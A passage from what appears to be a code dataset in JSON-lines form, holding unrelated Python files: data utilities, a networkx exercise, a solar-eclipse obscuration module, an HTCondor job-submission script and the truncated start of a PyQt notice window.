arguments for the function.\n\n Returns:\n R: The result of the function.\n \"\"\"\n # Get the start time and execute the function\n t1: float = time()\n result: R = func(*args, **kwargs)\n\n # Get the end time and calculate the elapsed time\n t2: float = time()\n elapsed_time = t2 - t1\n\n # Log the execution time and return the result of the function\n logging.info(\n f\"Method {func.__name__!r} of module {func.__module__!r} executed in {elapsed_time:.4f} seconds\"\n )\n return result\n\n return wrapper\n\n\ndef format_value(value: str | int | float) -> str:\n \"\"\"Format the value to 2 decimal places if it's a float.\"\"\"\n if isinstance(value, float):\n return f\"{value:.2f}\"\n return str(value)\n\n\ndef simple_tabulate(data: list, headers: list) -> str:\n \"\"\"Create a simple tabulated string representation of the provided data.\"\"\"\n # Determine the maximum width for each column\n col_widths = [max(len(str(value)) for value in col) for col in zip(*data, headers)]\n\n # Format rows with data\n rows = [headers] + data\n formatted_rows = [\n \"| \"\n + \" | \".join(\n [\n f\"{format_value(value).ljust(width)}\"\n for value, width in zip(row, col_widths)\n ]\n )\n + \" |\"\n for row in rows\n ]\n\n # Combine everything\n return \"\\n\".join(formatted_rows)\n\n\ndef get_files(\n dir_of_files: Path,\n ends_with: str,\n exclude_containing: str | None = None,\n descending: bool = True,\n) -> list[Path]:\n \"\"\"Retrieve files from a directory based on specific criteria.\n\n Args:\n dir_of_files (Path): Directory to search.\n ends_with (str): Desired file ending.\n exclude_containing (str, optional): String to exclude from file names. Defaults to None.\n descending (bool, optional): Whether to return files in descending order. Defaults to True.\n\n Returns:\n list[Path]: List of files that match the criteria.\n \"\"\"\n # Collect all file paths in the directory that meet the 'ends_with' criteria\n file_paths: list[Path] = [\n file_path\n for file_path in dir_of_files.iterdir()\n if file_path.is_file() and file_path.name.endswith(ends_with)\n ]\n # If exclude_containing is provided, filter out files that contain the exclude_containing string\n if exclude_containing:\n file_paths = [\n file_path\n for file_path in file_paths\n if exclude_containing not in file_path.name\n ]\n # Order the file paths by their name descending (latest first) or ascending (earliest first)\n file_paths.sort(reverse=descending)\n return file_paths\n\n\ndef read_by_extension(path: Path, read: bool = True) -> Callable:\n \"\"\"Read or write a file based on its extension.\n\n Args:\n path (Path): Path to the file.\n\n Returns:\n Callable: The function to read or write the file.\n \"\"\"\n if read:\n if path.suffix == \".feather\":\n return pd.read_feather\n elif path.suffix == \".csv\":\n return pd.read_csv\n elif path.suffix == \".xlsx\":\n return pd.read_excel\n elif path.suffix == \".pkl\":\n return pd.read_pickle\n else:\n raise ValueError(f\"Unsupported file extension: {path.suffix}\")\n else:\n if path.suffix == \".feather\":\n return pd.DataFrame.to_feather\n elif path.suffix == \".csv\":\n return pd.DataFrame.to_csv\n elif path.suffix == \".xlsx\":\n return pd.DataFrame.to_excel\n elif path.suffix == \".pkl\":\n return pd.DataFrame.to_pickle\n else:\n raise ValueError(f\"Unsupported file extension: {path.suffix}\")\n\n\ndef to_snake(camel_str: str) -> str:\n # Remove all whitespace\n camel_str = camel_str.replace(\" \", \"\")\n\n # Add an underscore before each uppercase letter that is either:\n # (a) preceded by a lowercase letter, or\n # (b) followed by a lowercase letter (and is not at the start of the string)\n snake_str = re.sub(r\"((?<=[a-z0-9])[A-Z]|(?!^)[A-Z](?=[a-z]))\", r\"_\\1\", camel_str)\n\n # Convert to lowercase using .casefold() which is a stronger version of .lower()\n return snake_str.casefold()\n\n\ndef apply_to_column(df: pd.DataFrame, col_name: str, func: Callable) -> pd.Series:\n try:\n rprint(df[col_name].value_counts(dropna=False).head(10))\n print(f\"New value counts after applying {func.__name__} to {col_name}\")\n return_series = df[col_name].apply(func)\n rprint(return_series.value_counts(dropna=False).head(10))\n return return_series\n except Exception as e:\n rprint(f\"Error applying {func.__name__} to {col_name}: {str(e)}\")\n return df[col_name]\n","repo_name":"oedokumaci/modern-ml","sub_path":"src/modern_ml/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29901378652","text":"import networkx as nx\n\nG=nx.MultiGraph()\nG.add_node('A',role='manager')\nG.add_edge('A','B',relation = 'friend')\nG.add_edge('A','C', relation = 'business partner')\nG.add_edge('A','B', relation = 'classmate')\nG.node['A']['role'] = 'team member'\nG.node['B']['role'] = 'engineer'\n\n#P = G.get_edge_data(\"A\", \"B\")[0]\n#node = G.number_of_edges()\nP = G.edge()\n\n#print (node)","repo_name":"sadfool1/Applied-Social-Networks---Networkx-Coursera-","sub_path":"Week 1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10599192284","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 26 13:17:51 2021\n\n@author: smrak@bu.edu\n\"\"\"\n\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport ephem\nimport concurrent.futures\nfrom scipy import ndimage\nRE = 6371 #km\n\ndef get_sza(time, glon, glat, horizon=None, alt_km=None):\n \n if horizon is None:\n if alt_km is None:\n alt_km = 0\n elif isinstance(alt_km, (list, np.ndarray)):\n alt_km = alt_km[0]\n horizon = -np.degrees(np.arccos(RE/(RE + alt_km)))\n \n def _sza(x, y):\n \n obs = ephem.Observer()\n obs.lat = np.deg2rad(y)\n obs.lon = np.deg2rad(x)\n obs.date = ephem.Date(time)\n \n sun = ephem.Sun()\n sun.compute(obs)\n sza = 90 - np.degrees(sun.alt) + horizon\n return sza\n def _sza_time(t):\n \n obs = ephem.Observer()\n obs.lat = np.deg2rad(glat)\n obs.lon = np.deg2rad(glon)\n obs.date = ephem.Date(t)\n \n sun = ephem.Sun()\n sun.compute(obs)\n sza = 90 - np.degrees(sun.alt) + horizon\n return sza\n \n def _sza_all(t, x, y):\n obs = ephem.Observer()\n obs.lat = np.deg2rad(y)\n obs.lon = np.deg2rad(x)\n obs.date = ephem.Date(t)\n \n sun = ephem.Sun()\n sun.compute(obs)\n sza = 90 - np.degrees(sun.alt) + horizon\n return sza\n \n if isinstance(glon, np.ndarray) and isinstance(time, datetime):\n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n sza_worker = np.asarray([ex.submit(_sza, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n\n sza = np.nan*np.ones(glon.ravel().size)\n for i in range(sza_worker.size):\n sza[i] = sza_worker[i].result()\n sza = sza.reshape(glon.shape)\n \n elif isinstance(time, np.ndarray) and not isinstance(glon, np.ndarray):\n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n sza_worker = np.asarray([ex.submit(_sza_time, time[i]) for i in range(time.size)])\n\n sza = np.nan*np.ones(time.size)\n for i in range(sza_worker.size):\n sza[i] = sza_worker[i].result()\n \n elif isinstance(time, np.ndarray) and isinstance(glon, np.ndarray) and isinstance(glat, np.ndarray):\n sza = np.nan * np.ones(time.size)\n for i in range(time.size):\n sza[i] = _sza_all(time[i], glon[i], glat[i])\n \n else:\n sza = _sza_time(time)\n return sza\n\ndef get_angles(time, glon, glat, ghgt=0):\n \n def _angles(glon, glat):\n sun, moon = objects(time,glon,glat,ghgt)\n sun_moon_sep = separation(sun.az, sun.alt, moon.az, moon.alt)\n sun_moon_azimuth = azimuth(sun.az, sun.alt, moon.az, moon.alt)\n return sun_moon_sep,sun_moon_azimuth,moon.radius\n \n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n angles_worker = np.asarray([ex.submit(_angles, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n\n sun_moon_separation_radian = np.nan*np.ones(glon.ravel().size)\n sun_moon_azimuth_radian = np.nan*np.ones(glon.ravel().size)\n moon_radius_radian = np.nan*np.ones(glon.ravel().size)\n for i in range(angles_worker.size):\n sun_moon_separation_radian[i] = angles_worker[i].result()[0]\n sun_moon_azimuth_radian[i] = angles_worker[i].result()[1]\n moon_radius_radian[i] = angles_worker[i].result()[2]\n \n return sun_moon_separation_radian.reshape(glon.shape), sun_moon_azimuth_radian.reshape(glon.shape), moon_radius_radian.reshape(glon.shape)\n\n#def get_parallactic_angle(time, glon, glat, ghgt):\n# \n# def _eta(glon, glat):\n# sun, moon = objects(time,glon,glat,ghgt)\n# return parallactic_angle(sun.az, sun.dec, glat)\n# \n# def _eta_times(t):\n# sun, moon = objects(t, glon, glat, ghgt)\n# return parallactic_angle(sun.az, sun.dec, glat)\n# \n# if isinstance(glon, np.ndarray) and isinstance(time, datetime):\n# with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n# eta_worker = np.asarray([ex.submit(_eta, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n# \n# eta = np.nan*np.ones(glon.ravel().size)\n# for i in range(eta_worker.size):\n# eta[i] = eta_worker[i].result()\n# \n# return eta.reshape(glon.shape)\n# \n# elif isinstance(time, np.ndarray):\n# eta = np.nan*np.ones(time.size)\n# with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n# eta_worker = np.asarray([ex.submit(_eta_times, time[i]) for i in range(time.size)])\n# for i in range(eta_worker.size):\n# eta[i] = eta_worker[i].result()\n# return eta\n# else:\n# eta = _eta(glon, glat)\n# return eta\n\ndef get_parallactic_angle(time, glon, glat, ghgt):\n \n def _eta(glon, glat):\n sun, moon = objects(time,glon,glat,ghgt)\n return parallactic_angle(sun.az, sun.dec, sun.alt, glat)\n \n def _eta_times(t):\n sun, moon = objects(t, glon, glat, ghgt)\n return parallactic_angle(sun.az, sun.dec, sun.alt, glat)\n \n if isinstance(glon, np.ndarray) and isinstance(time, datetime):\n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n eta_worker = np.asarray([ex.submit(_eta, glon.ravel()[i], glat.ravel()[i]) for i in range(glon.size)])\n \n eta = np.nan*np.ones(glon.ravel().size)\n for i in range(eta_worker.size):\n eta[i] = eta_worker[i].result()\n \n return eta.reshape(glon.shape)\n \n elif isinstance(time, np.ndarray):\n eta = np.nan*np.ones(time.size)\n with concurrent.futures.ThreadPoolExecutor(max_workers=50) as ex:\n eta_worker = np.asarray([ex.submit(_eta_times, time[i]) for i in range(time.size)])\n for i in range(eta_worker.size):\n eta[i] = eta_worker[i].result()\n return eta\n else:\n eta = _eta(glon, glat)\n return eta\n\ndef get_eof_mask_from_angles(image, sep, azm, eta, mrad, x0, y0, imres, pixscale):\n mx0, my0 = rotate(sep, azm-eta, 0.0, 0.0)\n mask = moon_mask(imres, mx0*pixscale + x0, my0*pixscale + y0, np.round(mrad, 8)*pixscale)\n return np.nansum(np.multiply(image,mask)) / np.nansum(image)\n\ndef get_times(t0,t1,dm=0, ds=0):\n assert (dm>0) or (ds>0)\n times =[]\n while t0 <= t1:\n times.append(t0)\n t0 += timedelta(minutes = dm, seconds=ds)\n return np.array(times)\n\ndef moon_mask(N, mx1, my1, r):\n xaxis = np.arange(N) - mx1\n yaxis = np.arange(N) - my1\n mask = ((np.zeros((N, N)) + yaxis*yaxis).T + xaxis*xaxis) < r*r\n return ~mask\n\ndef horizon_mask(horizon, pixscale, selv, y0, imsdo):\n# if np.degrees(horizon) > -3:\n hmask = np.ones(imsdo.shape[0])\n for i in range(hmask.size):\n tmp = (i-y0) / pixscale\n hmask[i] = 0 if tmp < horizon else 1\n# for i in range(hmask.size):\n# tmp = selv + ((i - int(y0)) / pixscale)\n# if tmp < horizon:\n# hmask[i] = 0\n hmask = np.array([hmask,]*imsdo.shape[0]).T\n# else:\n# hmask = np.ones(imsdo.shape)\n# print (hmask)\n return hmask\n\n#def parallactic_angle(sazm, sdec, glat):\n# sineta = np.sin(sazm) * np.cos(np.radians(glat)) / np.cos(sdec)\n# return -np.arcsin(sineta)\n\ndef parallactic_angle(sazm, sdec, salt, glat):\n zd = np.pi/2 - salt\n numerator = np.sin(np.radians(glat)) - (np.sin(sdec)*np.cos(zd))\n denominator = np.cos(sdec) * np.sin(zd)\n coseta = numerator / denominator\n if coseta > 1.00 and coseta <= 1.001:\n coseta = 1.0\n elif coseta > 1.001:\n print (\"Coseta > 1.0???\")\n \n if sazm < np.pi:\n return +np.arccos(coseta)\n else:\n return np.arccos(coseta)\n\ndef rotate(sep, azm, x0, y0):\n# (elv,azm,olon,olat,xlon,xlat)\n sint = np.sin(sep)\n cost = np.cos(sep)\n sinp = np.sin(azm)\n cosp = np.cos(azm)\n sinl = np.sin(y0)\n cosl = np.cos(y0)\n \n y1 = np.arcsin( sinl*cost + cosl*sint*cosp )\n x1 = x0 + np.arctan2( sint*sinp, cosl*cost - sinl*sint*cosp )\n \n return x1, y1\n\ndef objects(T, glon, glat, ghgt):\n assert isinstance(T, datetime)\n observer = ephem.Observer()\n observer.lon = str(glon)\n observer.lat = str(glat)\n observer.elevation = ghgt\n observer.date = T\n observer.pressure = 0\n observer.horizon = -np.arccos(RE / (RE + ghgt/1e3))\n \n sun = ephem.Sun(observer)\n moon = ephem.Moon(observer)\n \n return sun, moon\n\ndef azimuth(sazm, selv, mazm, melv):\n \n coslt1 = np.cos(melv)\n sinlt1 = np.sin(melv)\n \n coslt0 = np.cos(selv)\n sinlt0 = np.sin(selv)\n \n cosl0l1 = np.cos(mazm-sazm)\n sinl0l1 = np.sin(mazm-sazm)\n \n cosc = (sinlt0 * sinlt1) + (coslt0 * coslt1 * cosl0l1) # Cos(a to b)\n sinc = np.sqrt(1 - (cosc*cosc))\n \n if (abs(sinc) > 1e-7):# Small angle?\n cosaz = (coslt0 * sinlt1 - sinlt0 * coslt1 * cosl0l1) / sinc # Azimuth\n sinaz = (sinl0l1 * coslt1) / sinc\n else: # It is antipodal\n cosaz = 1\n sinaz = 0\n \n azm = np.arctan2(sinaz, cosaz)\n return azm\n\ndef separation(sazm, selv, mazm, melv):\n return np.round(ephem.separation((sazm, selv), (mazm, melv)), 8)\n\ndef get_EOF(sr, mr, mx0, my0):\n \n sx0 = 0\n sy0 = 0\n \n if mr > sr:\n r1 = mr\n r2 = sr\n else:\n r1 = sr\n r2 = mr\n d = np.sqrt(abs(sx0-mx0)**2 + abs(sy0-my0)**2)\n if d > (r1+r2)*1.05:\n of = 1\n elif d <= (r1-r2):\n of = 1 - ((np.pi * mr**2) / (np.pi * sr**2))\n else:\n d1 = (r1**2 - r2**2 + d**2) / (2*d)\n d2 = d - d1\n \n A = ( r1**2 * np.arccos(d1/r1) - (d1 * np.sqrt(r1**2 - d1**2)) ) + \\\n ( r2**2 * np.arccos(d2/r2) - (d2 * np.sqrt(r2**2 - d2**2)) )\n\n of = 1 - (A / (np.pi * sr**2)) if A > 0 else 1\n \n return of\n\n#def eclipse_geo_novas(T, glon, glat, ghgt=0, srad_fact=1, plot=0):\n# assert isinstance(T, datetime)\n# hour = T.hour + T.minute / 60 + T.second / 3600\n# sazm,selv,srad,sdec,mazm,melv,mrad,azm,sm_dist = eomff.eom(T.year,T.month,T.day,hour,glon,glat,ghgt,srad_fact)\n# \n# horizon = (-np.arccos(RE / (RE + ghgt/1e3)) - selv - srad) #/ srad\n# if horizon > 0:\n# return 0\n# else:\n# mx0, my0 = eomff.rotate(sm_dist, azm, 0.0, 0.0)\n# of = get_EOF(srad, mrad, mx0, my0)\n# return of\n \ndef mask_geo_ephem(T, glon, glat, ghgt=0, srad_fact=1, plot=0):\n sun, moon = objects(T, glon, glat, ghgt)\n srad = np.round(sun.radius * srad_fact, 8)\n mrad = np.round(moon.radius, 8)\n horizon = (-np.arccos(RE / (RE + ghgt/1e3)) - sun.alt - sun.radius) #/ srad\n if horizon > 0:\n return 0\n else:\n sm_dist = np.round(ephem.separation((sun.az, sun.alt), (moon.az, moon.alt)), 8)\n azm = azimuth(sun.az, sun.alt, moon.az, moon.alt)\n mx0, my0 = rotate(sm_dist, azm, 0.0, 0.0)\n of = get_EOF(srad, mrad, mx0, my0)\n return of\n\ndef mask_sdo_ephem(T, glon, glat, ghgt, x0, y0, imsdo, pixscale, use_parallactic_angle=1):\n sun, moon = objects(T,glon,glat,ghgt)\n sazm, selv = sun.az, sun.alt\n mazm, melv = moon.az, moon.alt\n if sazm > np.pi:\n sazm -= 2*np.pi\n if mazm > np.pi:\n mazm -= 2*np.pi\n \n horizon = (-np.arccos(RE / (RE + ghgt/1e3)) - selv - sun.radius)\n sep = separation(sazm, selv, mazm, melv) \n if horizon*pixscale >= (imsdo.shape[0]/2-imsdo.shape[0]):\n hmask = horizon_mask(horizon=horizon, selv=selv, imsdo=imsdo, pixscale=pixscale, y0=y0)\n else:\n hmask = np.ones_like(imsdo)\n if use_parallactic_angle:\n eta = parallactic_angle(sazm, sun.dec, selv, glat)\n else:\n eta = 0\n# if (sep*pixscale) < (imsdo.shape[0]*1.4142+np.round(moon.radius, 8)*pixscale):\n if (sep*pixscale) < (imsdo.shape[0]+np.round(moon.radius, 8)*pixscale):\n \n azm = azimuth(sazm, selv, mazm, melv)\n # Rotation of the moon if ~100x faster than rotation of the Sun for the parallactinc angle\n # ndimage.rotate(imsdo, np.rad2deg(eta), reshape=False) --- takes about 3seconds to compute\n mx0, my0 = rotate(sep, azm+eta, 0.0, 0.0)\n mmask = moon_mask(imsdo.shape[0], mx0*pixscale + x0, my0*pixscale + y0, np.round(moon.radius, 8)*pixscale)\n mask = np.multiply(hmask, mmask)\n of = np.nansum(np.multiply(imsdo,mask)) / np.nansum(imsdo)\n else:\n of = np.nansum(np.multiply(imsdo,hmask)) / np.nansum(imsdo)\n return of\n\ndef eof_time(t0, t1, glon, glat, ghgt, srad_fact=1, dm=10, ds=0, mode='ephem'):\n times = get_times(t0,t1,dm=dm, ds=ds)\n if not isinstance(srad_fact, list):\n srad_fact = [srad_fact]\n \n OF = np.nan * np.zeros((times.size, len(srad_fact)))\n \n for sf, srad_factor in enumerate(srad_fact):\n for i,T in enumerate(times):\n# if mode == 'novas':\n# OF[i, sf] = eclipse_geo_novas(T, glon=glon, glat=glat, ghgt=ghgt, srad_fact=srad_factor)\n# else:\n OF[i, sf] = mask_geo_ephem(T, glon=glon, glat=glat, ghgt=ghgt, srad_fact=srad_factor)\n OF[OF<0] = 0\n return times, np.squeeze(OF)\n\ndef mask_latalt_geo(T, glat, ghgt, glon0=0, srad_fact=1, mode='novas'):\n assert isinstance(ghgt, np.ndarray)\n assert isinstance(glat, np.ndarray)\n assert isinstance(T, datetime)\n if not isinstance(srad_fact, list):\n srad_fact_list = [srad_fact]\n else:\n srad_fact_list = srad_fact\n \n OF = np.zeros((glat.size, ghgt.size, len(srad_fact_list)))\n for s, srad_fact in enumerate(srad_fact_list):\n for i, lat in enumerate(glat):\n for j, alt in enumerate(ghgt):\n# if mode == 'novas':\n# OF[i,j,s] = eclipse_geo_novas(T=T, glon=glon0, glat=lat, ghgt=alt, srad_fact=srad_fact)\n# else:\n OF[i,j,s] = mask_geo_ephem(T=T, glon=glon0, glat=lat, ghgt=alt, srad_fact=srad_fact)\n return np.squeeze(OF)\n\ndef mask_lonlat_geo(T, glon, glat, ghgt=0, srad_fact=1, mode='novas'):\n \n assert isinstance(glon, np.ndarray)\n assert isinstance(glat, np.ndarray)\n assert isinstance(T, datetime)\n \n OF = np.zeros((glon.size, glat.size))\n for i, lon in enumerate(glon):\n for j, lat in enumerate(glat):\n# if mode == 'novas':\n# OF[i,j] = eclipse_geo_novas(T=T, glon=lon, glat=lat, ghgt=ghgt, srad_fact=srad_fact)\n# else:\n OF[i,j] = mask_geo_ephem(T=T, glon=lon, glat=lat, ghgt=ghgt, srad_fact=srad_fact)\n return np.squeeze(OF)\n\n#%% SDO AIA\ndef eof_time_sdo(SDO, t0, t1, glon, glat, ghgt, wl=193, dm=10,ds=0):\n\n times = get_times(t0,t1,dm=dm,ds=ds)\n OF = np.ones(times.size)\n instrument = list(SDO.variables)[0][:3]\n imsdo = SDO[list(SDO.variables)[0]].values\n if instrument == 'EIT':\n imsdo = np.subtract(ndimage.rotate(imsdo, 180), 900)\n for i,T in enumerate(times):\n if (i+1)%10 == 0:\n print (\"Processing {}/{}\".format(i+1, times.size))\n OF[i] = mask_sdo_ephem(T, glon, glat, ghgt, SDO.x0, SDO.y0, imsdo, SDO.pixscale)\n return times, OF\n\ndef mask_lonlat_sdo(SDO, T, glon, glat, ghgt, wl=193, verbose=False):\n assert isinstance(glon, np.ndarray)\n assert isinstance(glat, np.ndarray)\n OF = np.ones((glon.size, glat.size))\n if verbose:\n c = 1\n C = glon.size*glat.size\n for i in range(glon.size):\n if verbose:\n t0 = datetime.now()\n for j in range(glat.size):\n if verbose:\n if c%1000 == 0:\n print (\"{}/{}\".format(c,C))\n OF[i,j] = mask_sdo_ephem(T, glon[i], glat[j], ghgt=ghgt, x0=SDO.x0, y0=SDO.y0, imsdo=SDO['AIA{}'.format(wl)].values, pixscale=SDO.pixscale)\n if verbose:\n c+=1\n if verbose:\n print(datetime.now()-t0)\n return OF\n\ndef mask_latalt_sdo(SDO, T, glon, glat, ghgt, wl=193, verbose=False):\n assert isinstance(ghgt, np.ndarray)\n assert isinstance(glat, np.ndarray)\n assert isinstance(glon, (int, float))\n \n OF = np.ones((glat.size, ghgt.size))\n if verbose:\n c = 1\n C = glon.size*glat.size\n for i in range(glat.size):\n if verbose:\n t0 = datetime.now()\n for j in range(ghgt.size):\n if verbose:\n if c%1000 == 0:\n print (\"{}/{}\".format(c,C))\n OF[i,j] = mask_sdo_ephem(T, glon, glat[i], ghgt=ghgt[j], x0=SDO.x0, y0=SDO.y0, imsdo=SDO['AIA{}'.format(wl)].values, pixscale=SDO.pixscale)\n if verbose:\n c+=1\n if verbose:\n print(datetime.now()-t0)\n return OF\n\n# Spacecraft\ndef eof_satellite(times, glon, glat, alt_km, SDO=None, srad=1.0, wl='geo', \n use_parallactic_angle=1, verbose=False):\n OF = np.zeros(times.size)\n for i,T in enumerate(times):\n if verbose:\n if (i+1)%10 == 0:\n print (\"Processing {}/{}\".format(i+1, times.size))\n sza = get_sza(T, glon[i], glat[i], alt_km=alt_km[i])\n if sza < 95:\n if SDO is not None:\n OF[i] = mask_sdo_ephem(T, glon[i], glat[i], alt_km[i]*1e3, SDO.x0, SDO.y0, \n SDO['AIA{}'.format(wl)].values, SDO.pixscale,\n use_parallactic_angle=use_parallactic_angle)\n else:\n OF[i] = mask_geo_ephem(T, glon[i], glat[i], alt_km[i]*1e3, srad_fact=srad)\n return times, OF","repo_name":"aldebaran1/pyEclipse","sub_path":"eclipse/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17461,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"19776697561","text":"import json\nfrom glob import glob\nimport os\nfrom argparse import ArgumentParser\nfrom subprocess import Popen, PIPE\nfrom pathlib2 import Path\n\n\ndef make_parser():\n parser = ArgumentParser(description=\"Submit predicting of LLR \\\nSamples\")\n parser.add_argument(\"-s\", \"--submit_base\", type=str, \n help=\"Base dir to submit from\")\n parser.add_argument(\"-o\", \"--output_dir\" ,type=str,\n help=\"Dir to write output files to\")\n parser.add_argument(\"-y\", \"--year\", type=str, \n help=\"16, 17 or 18\")\n parser.add_argument(\"--add_htautau\", action=\"store_true\",\n help=\"If set, evaluate htautau model.\")\n parser.add_argument(\"-j\", \"--json\", type=str,\n help=\"JSON File containing paths to samples\")\n parser.add_argument(\"-n\", \"--n_files\" ,type=int, default=5,\n help=\"number of files per job\")\n return parser\n \n\ndef checkmake_dir(path):\n if not os.path.exists(path):\n print(f\"{path} does not exist.\")\n print(\"Shall I create it now?\")\n yn = input(\"[y/n] ?\")\n if yn.strip().lower() == 'y':\n print('Creating dir(s)!')\n os.makedirs(path)\n else:\n raise ValueError(f\"{path} does not exist\")\n\n\ndef return_subfile(outdir, executable):\n file_str = f\"executable={executable}\\n\\\nlog = singularity.$(ClusterId).log\\n\\\nerror = singularity.$(ClusterId).$(ProcId).err\\n\\\noutput = singularity.$(ClusterId).$(ProcId).out\\n\\\n\\n\\\nshould_transfer_files = YES\\n\\\nMY.JobFlavour = \\\"microcentury\\\"\\n\\\noutput_destination = root://eosuser.cern.ch//{outdir}\\n\\\nMY.XRDCP_CREATE_DIR = True\\n\\\nMY.SingularityImage = \\\"/cvmfs/unpacked.cern.ch/registry.hub.docker.com/jwulff/lumin_3.8:latest\\\"\\n\\\n\\n\\\nArguments = $(FILES)\\n\\\nqueue\"\n# transfer_input_files = root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/branchnames.py, root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/feature_calc.py,root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/features.py,root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/first_nn.py,root://eosuser.cern.ch//eos/user/j/jowulff/res_HH/hbt_resonant_evaluation/helpers.py\\n\\\n return file_str\n\n\ndef return_executable(sum_w, year, sample_id, add_htautau):\n function_call_str = f'python ${{EXE}} -f $@ -s {sum_w} -i {sample_id} -y {year}'\n if add_htautau:\n function_call_str += \" --add_htautau\"\n file_str = f'#!/usr/bin/bash\\n\\\nEXE=\"/eos/user/j/jowulff/res_HH/hbt_data_proc/evaluate_klub.py\"\\n\\\n{function_call_str} || exit 1\\n\\\nexit 0'\n return file_str\n\n\ndef parse_goodfile_txt(goodfile:Path,):\n skims_dir = goodfile.absolute().parent\n with open(goodfile) as gfile:\n gfiles = sorted([Path(line.rstrip()) for line in gfile])\n if len(gfiles) == 0:\n print(f\"Found 0 files in {goodfile}. Globbing all .root files in skim dir.\")\n # goodfiles.txt is empty: just glob all .root files in \n # skims dir and hope they're good\n gfiles = sorted([i for i in skims_dir.glob(\"*.root\")])\n else:\n # check if the paths have been updated\n if gfiles[0].parent != skims_dir:\n # if not stick the filename on the end of the provided path\n # and hope for the best\n gfiles = [skims_dir / i.name for i in gfiles]\n return [str(gfile) for gfile in gfiles]\n\n\ndef main(submit_base_dir: str, \n sample_json: str, \n outdir: str,\n year: str,\n add_htautau: bool,\n n_files: int=5):\n\n with open(sample_json) as f:\n d = json.load(f)\n # select the year\n d = d[year]\n\n if not submit_base_dir.startswith(\"/afs\"):\n raise ValueError(\"Submission must happen from /afs!\")\n checkmake_dir(submit_base_dir)\n checkmake_dir(outdir)\n \n for i, sample in enumerate(d):\n if \"_VBF_\" in sample:\n continue\n print(f\"Creating submission dir and writing dag \\\nfiles for sample ({i+1}/{len(d)})\\r\", end=\"\")\n # data samples are channel-dependant\n submit_dir = submit_base_dir.rstrip(\"/\")+f\"/{sample}\"\n eos_outdir = outdir.strip(\"/\")+f\"/{sample}\"\n #xrdcp_create_dir = True in submit script\n if not os.path.exists(submit_dir):\n os.mkdir(submit_dir)\n dagfile = submit_dir+f\"/{sample}.dag\"\n submitfile = submit_dir+f\"/{sample}.submit\"\n afs_exe = submit_dir+f\"/executable.sh\"\n path = d[sample][\"Path\"]\n sum_w = d[sample][\"Sum_w\"]\n sample_id = d[sample][\"Sample_ID\"]\n goodfile = path+\"/goodfiles.txt\"\n if not os.path.exists(afs_exe):\n with open(afs_exe, \"w\") as f:\n print(return_executable(sum_w, year, sample_id, add_htautau), file=f)\n prcs = Popen(f\"chmod 744 {afs_exe}\",shell=True, \n stdin=PIPE, stdout=PIPE, encoding='utf-8')\n out, err = prcs.communicate()\n if err:\n print(err)\n raise ValueError(f\"Unable to chmod {afs_exe} to 744\")\n else:\n print(f\"\\n {afs_exe} already exists.. Not creating new one \\n\")\n if not os.path.exists(goodfile):\n print(f\"{sample} does not have a goodfile.txt at \\\n{path}\")\n gfiles = glob(d[sample][\"Path\"]+\"/*.root\")\n else:\n gfiles = parse_goodfile_txt(Path(goodfile))\n # filter files for broken files\n filechunks = [gfiles[i:i+n_files] for i in range(0, len(gfiles), n_files)]\n if not os.path.exists(dagfile):\n with open(dagfile, \"x\") as dfile:\n for chunk in filechunks:\n print(f\"JOB {chunk[0].split('/')[-1]} {submitfile}\", file=dfile)\n print(f'VARS {chunk[0].split(\"/\")[-1]} FILES=\"{\" \".join(chunk)}\"', file=dfile)\n #for file in gfiles:\n #print(f\"JOB {file.split('/')[-1]} {submitfile}\", file=dfile)\n #print(f'VARS {file.split(\"/\")[-1]} FILES=\"{file}\"', file=dfile)\n submit_string = return_subfile(outdir=outdir, executable=afs_exe)\n else:\n print(f\"\\n {dagfile} already exists.. Not creating new one \\n\")\n\n if not os.path.exists(submitfile):\n submit_string = return_subfile(outdir=eos_outdir, executable=afs_exe)\n with open(submitfile, \"x\") as subfile:\n print(submit_string, file=subfile)\n else:\n print(f\"\\n {submitfile} already exists.. Not creating new one \\n\")\n\n\nif __name__ == \"__main__\":\n parser = make_parser()\n args = parser.parse_args()\n main(submit_base_dir=args.submit_base,\n sample_json=args.json,\n outdir=args.output_dir,\n year=args.year,\n add_htautau=args.add_htautau,\n n_files=args.n_files)\n","repo_name":"JohanWulff/hbt_data_proc","sub_path":"write_dag.py","file_name":"write_dag.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36754866507","text":"from PyQt5 import QtWidgets\r\nfrom GUI.notice_window import Window\r\nimport help_file\r\n\r\n\r\nclass NoticeWindow(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super(NoticeWindow, self).__init__()\r\n self.ui = Window()\r\n self.ui.setup_ui(self)\r\n\r\n table_data = help_file.database.pull_data(help_file.active_path)\r\n active_data = table_data[help_file.active_id]\r\n\r\n self.ui.name.setText(active_data[1])\r\n self.ui.date.setText(f'date: {active_data[2]}')\r\n self.ui.time.setText(f'time: {active_data[3]}:{active_data[4]}')\r\n\r\n self.ui.deactivate_button.clicked.connect(self.close_window)\r\n\r\n def close_window(self):\r\n query = f\"\"\"\r\n UPDATE data 